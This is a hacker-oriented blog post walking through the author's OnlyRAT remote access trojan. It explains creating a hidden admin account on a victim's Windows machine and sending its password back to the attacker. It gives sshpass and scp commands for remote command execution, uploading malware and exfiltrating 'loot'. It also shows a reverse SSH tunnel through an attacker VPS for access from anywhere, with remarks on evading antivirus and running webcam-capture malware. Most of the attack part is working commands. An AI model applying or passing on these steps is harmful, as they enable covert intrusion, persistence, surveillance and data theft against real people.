// Automating Network Oriented Attacks in Malware...
Hey Hackers! Many of you may already be familiar with my tool OnlyRAT. If not, allow me to introduce it to you. OnlyRAT is a network oriented Remote Access Toolkit [RAT]. This special piece of malware allows us to remotely access a target system, upload files to that system, download files from that system, and to execute any arbitrary commands that we wish. Originally, OnlyRAT was supposed to be a simple, YouTube friendly, SSH RAT.
SSH, otherwise known as Secure Shell, is a network protocol that allows users to remotely access the command line on another system. It is often used in network administration to easily allow administrators to remotely conduct tasks on a computer.
But as I continued development, I got to learn how powerful SSH really is and a lot of the cool things you can do with it. OnlyRAT went from being a shitty proof of concept to a network oriented RAT. Meaning that all of our attacks are sent over as commands over the network. So Anti-Virus [AV] can't detect it because there are no files to detect.
// OnlyRAT Basics:
Before we can dive on how powerful SSH truly is, we have to gain an understanding of the OnlyRAT malware. OnlyRAT can be installed on to a target computer in two ways. It can be installed directly from the GitHub page it is hosted on or you can install it from a Virtual Private Server [VPS].
A VPS is a server we can host directly on the internet, so we can access it from anywhere. It has a static IP Address that doesn't change, so we can always reach out to it or host services on it with ease.
OnlyRAT has scripts that will automate either of these installations, but there is a reason why both installation options are available [totally not a foreshadow towards something really cool we can do with SSH]. Once either of these scripts are executed, it will create a hidden admin [named "onlyrat"] on the users system and open port 22 [the default network port for SSH]. Once completed, the installation script will send a "<username>.rat" configuration file back to the attacker.
The configuration file holds all of the important information OnlyRAT needs to reach back to our target computer. Configuration files also allow the attacker to have a database of all of their compromised targets.
Target IP Address
OnlyRAT Admin Password
Target Temp Directory
Target Startup Directory
VPS IP Address
VPS Port
Connection Type
Note: a VPS is NOT required for OnlyRAT to work. Lines 5 and 6 will be added depending on how OnlyRAT is installed.
// Basic SSH:
Lets say there is an SSH server on the network with an IP address of 192.168.1.50. We can use basic syntax to connect to the computer. We specify the SSH command, followed by the username we want to log in as and the IP address of the server.
After entering, we will be prompted to enter our password and we officially have remote access to a computer. If we want to automate the connection in some sort of malware, we can use a tool called SSHPass to parse in our password so we don't need to enter it into a prompt. All we need to do is add our SSH command to SSHPass with our password passed into a "-p" flag.
sshpass -p "DXael" ssh onlyrat@192.168.1.50 Now we can immediately SSH into a server with no password prompt needed. So we officially automated remote connections into computers. This is essentially how OnlyRAT's "orconsole" feature works.
// Remote Code Execution:
Yeah you heard me right, we can execute code over SSH. No, I don't mean remotely connecting to a computer and then typing in code to execute. I am talking about a one liner that allows us to parse in commands into our SSH connection. We simply have to put the respective command line code in quotes after our SSH connection. Let's try listing the contents of a directory [assuming our target is a Windows computer].
# normal ssh
ssh onlyrat@192.168.1.50 'dir'
# password parsing
sshpass -p "DXael" ssh onlyrat@192.168.1.50 'dir'Running either of these commands will return the contents of the directory we remote into. Now in place of "dir", we can place any Windows command line we want. If we want to run PowerShell, we can just put "powershell /c" followed by the whatever PowerShell code you wish to run. We can also run any executable files we want like calculator, notepad, or any malware we may have on the system. But note we will be running them as the OnlyRAT user, and not as our target. But there is a work around I will discuss later.
// File Upload and Download:
While SSH is designed for remote connections, another protocol built off of SSH allows us to remotely upload and download files to and from a target computer. This protocol is called Secure Copy, but often referred to as "SCP". To upload a file with SCP, we execute the SCP program and pass in the file we want to upload, the user@host to save it to, and use a colon ":" to specify the path to save the file on said host.
# normal scp
scp file.txt onlyrat@192.168.1.50:C:\Users\Jerry\Desktop
# recursive scp for directory uploads
scp -r folder onlyrat@192.168.1.50:C:\Users\Jerry\DesktopGreat! we can upload files to a target, but its still prompting us to enter our OnlyRAT user password. Well if SCP is built off of SSH, can we use SSHPass? Yes, yes you can!
sshpass -p "DXael" scp file.txt onlyrat@192.168.1.50:C:\Users\Jerry\DesktopNow we can automate file uploads! So we can upload malware, malicious documents, payloads, fake shortcuts on their desktop, whatever it may be. To conduct a remote download with SCP, we execute the SCP program and pass in the user@host, the specified path on that host [again using that colon ":"], and where you wish to save it on your computer. In this example, we will use the period "." to represent our current directory.
# normal scp
scp onlyrat@192.168.1.50:C:\Users\Jerry\Desktop\file.txt .
# password parsing
sshpass -p "DXael" scp onlyrat@192.168.1.50:C:\Users\Jerry\Desktop\file.txt .Now have automated our ability to download files off of our target computer. This great for any documents, photos, or loot we wish to exfiltrate off of a target computer.
// Port Forwarding:
Up until this point, we have only been able to access our target if we are on the same network. If an attacker were to switch to another network, they couldn't reach back to "192.168.1.50" because that IP address belongs to a different machine on the new network. Typically, in order to port forward we need to change configurations in a router to allow that port to be forwarded out of the network. Our malware doesn't have access to the router nor does it have the capabilities to edit the routers configurations and forward ports. But, SSH allows us to forward ports outside of the network. Here is a little diagram showcasing the network layout.
The section on the top showcases what we are already familiar with; a local SSH connection between two computers. This local connection would have been set up through the "From GitHub" option of installing. The second section on the bottom showcases the SSH port forwarding capabilities. The VPS installation of OnlyRAT does a few extra steps then the default "From GitHub" installation. The attacker can use ...
onlyrat -s
# or
onlyrat --setup... to setup their attacker machine and VPS [more instructions here]. But I will show you how it works in more depth. On our VPS, we edit the "/etc/ssh/sshd_config" file and change the following to be true.
AllowTcpForwarding yes
GatewayPorts yesThis will allow us to forward traffic through our VPS. After we restart the SSH service, we can create an SSH key on our attacker machine for our VPS server.
A SSH Key is a file that authorizes our SSH connection to a specific server. That way we can connect without a password or have a more secure method of connecting by placing a different password on the key.
To generate the key, we can use the "ssh-keygen" program. This program will generate a SSH key we can use for our VPS. We can save it to the name "key" and give it no password. The reason the key has no password is because Windows doesn't have SSHPass, so we can use the key to authorize and automate the connection between the target and the VPS. With our new key, we can set its proper permissions and copy the id.
chmod 600 key
ssh-copy-id -i key user@X.X.X.X
ssh user@X.X.X.X -i key # test the keyuser - username of user on VPS
X.X.X.X - domain or IP Address of VPS
Now we can use our VPS to host a web server to make our key accessible across the internet to our target. The target will need this key to connect to our VPS and route traffic from its SSH port to a port on the VPS. Make sure you give the key file the "read" permission to avoid 403 errors.
scp -r key user@X.X.X.X:/var/www/html
ssh user@X.X.X.X
cd /var/www/html
chmod +r key
sudo service apache2 startapache2 - a web hosting service
Now all that needs to happen is for our target machine to make a web request to download the key, and execute the following command.
ssh -R 9494:localhost:22 user@X.X.X.X -i keyThe SSH command above uses the "-R" argument to route traffic to a specified remote port on the VPS. In this case, we are using port "9494" on the VPS. From there, it uses the colon to specify what service on what host to route to that remote port. In this example, we route our localhost SSH service on port 22. We carry on with the rest of the SSH connection but add a "-i" to add our key. This is so we can automate our SSH connection with no password needed.
// Connecting To The Forwarded Port:
To connect to our target machine on a port forwarded VPS, all we need to do is connect to our VPS on that port with the target as our specified user. We can specify ports with the "-p" argument.
ssh onlyrat@X.X.X.X -p 9494Just like that, we can access our target machine from anywhere on the internet! Of course, that was a lot of configurations we had to do, so OnlyRAT will automate most of this process for us.
// OnlyRAT Flaws:
OnlyRAT is a really clever malware and a great general proof of concept. It dives into the SSH protocol and exploits its extraneous features to its advantage. But in a scenario where SSH is blocked on a network, OnlyRAT would not be the ideal malware to use. We could attempt switching the port that SSH is running on, but it would still vary on the firewall we are dealing with.
Since Windows doesn't have SSHPass, we need to use a SSH Key to automate our connections from our target to our VPS. The main problem with this is that there is now an SSH Key that grants access to our VPS simply sitting on our target computer.
When the target routes through one of the ports on our VPS, the port will show up as busy because it has the targets SSH traffic being routed through it. This is to be expected, but if our target were to restart there computer OnlyRAT would be unable to reconnect to the VPS. This is due to the port still being marked as busy. The fix for this should be a pretty simple script we can create on our VPS to clear the port if it is found to be inactive.
// Malware Execution:
We aren't the target user, we are a hidden admin. So if we connected to a target computer using the OnlyRAT Console [orconsole], we would connect as the onlyrat admin user, and not the target user. This is because we don't have the target password to login as. In the orconsole, if we ran a "notepad.exe", the notepad process wouldn't pop up on the targets screen. This is due to how we are executing notepad on a session under the onlyrat admin. However, the notepad still executed, whether we see it or not. This means we can still run system level malware and have it execute system wide. For example, if I ran a malware that captures photos from the webcam, even if we ran it as our onlyrat user it would still work.
Thanks for reading, and as always,
Happy Hacking!
// Socials:
© 2022 by Cosmodium CyberSecurity LLC